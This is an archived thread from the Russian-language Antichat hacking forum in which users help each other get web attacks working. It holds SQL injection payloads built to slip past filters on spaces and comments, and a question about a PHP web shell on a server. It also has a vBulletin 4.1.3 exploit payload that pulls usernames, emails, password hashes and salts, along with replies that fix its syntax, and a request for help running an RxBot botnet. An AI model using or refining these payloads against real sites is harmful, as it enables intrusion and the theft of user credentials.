ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.03.2012, 18:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от faza02
faza02 said:
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное
Либо
(1)and(1)=(1)union(select(1),2,3,4,5,6)+--+
|
|
|
|
12.03.2012, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
Я вас наверно уже задолбал)
ну ладно)
при открытии мини-шелла с кодом:
получается вот такая петрушка при ?cmd=phpinfo() и так далее:
либо unexpected $end
либо T_STRING
system не катит, так как disallow.
в чем подвох? |
|
|
|
12.03.2012, 19:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от stan0009
stan0009 said:
Я вас наверно уже задолбал)
ну ладно)
при открытии мини-шелла с кодом:
получается вот такая петрушка при ?cmd=phpinfo() и так далее:
либо unexpected $end
либо T_STRING
system не катит, так как disallow.
в чем подвох? ?cmd=phpinfo() ;
|
|
|
|
12.03.2012, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
если бы. так при любых командах
я догадываюсь что дело в сервере
|
|
|
|
12.03.2012, 20:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от None
Сообщение от faza02
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное
Вот такое нагуглил, может, что-нибудь подойдет в твоем случае
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Q[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Нашел sql[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]инъекцию[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]но злые админы поставили на фильтрацию на пробел[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Существуют ли аналоги пробела в sql[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]запросах[/COLOR][COLOR="#007700"]?
[/COLOR][COLOR="#0000BB"]A[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Еще как существуют[/COLOR][COLOR="#007700"]![/COLOR][COLOR="#0000BB"]Вот наиболее часто применяемые способы для замены пробела[/COLOR][COLOR="#007700"]:
+[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2B[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]табуляция[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]возврат каретки[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]0D[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]перевод строки[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]0A[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]коментарий[/COLOR][COLOR="#FF8000"]/**/
[/COLOR][COLOR="#0000BB"]скобки[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]users[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Сообщение от None
если бы. так при любых командах
я догадываюсь что дело в сервере
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Поэкспериментируй с этими.
|
|
|
|
13.03.2012, 01:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от None
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
как тут в конце заменить на скобки?
|
|
|
13.03.2012, 03:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
59158
Репутация:
2
|
|
Ребята!!) Подскажите как управлять RxBot в мирке (Botnet)
|
|
|
|
13.03.2012, 12:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
2205
Репутация:
0
|
|
Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3
Код:
Code:
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
а DB мне в ответ вот так:
Код:
Code:
Invalid SQL:
SELECT socialgroup.name
FROM socialgroup AS socialgroup
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1);
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Вопрос: как победить эту долбаную скобку в конце? |
|
|
|
13.03.2012, 12:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Добавить вот здесь:
&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
|
|
|
|
13.03.2012, 12:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
тогда нужно сделать так
&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )) FROM user WHERE userid=1
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
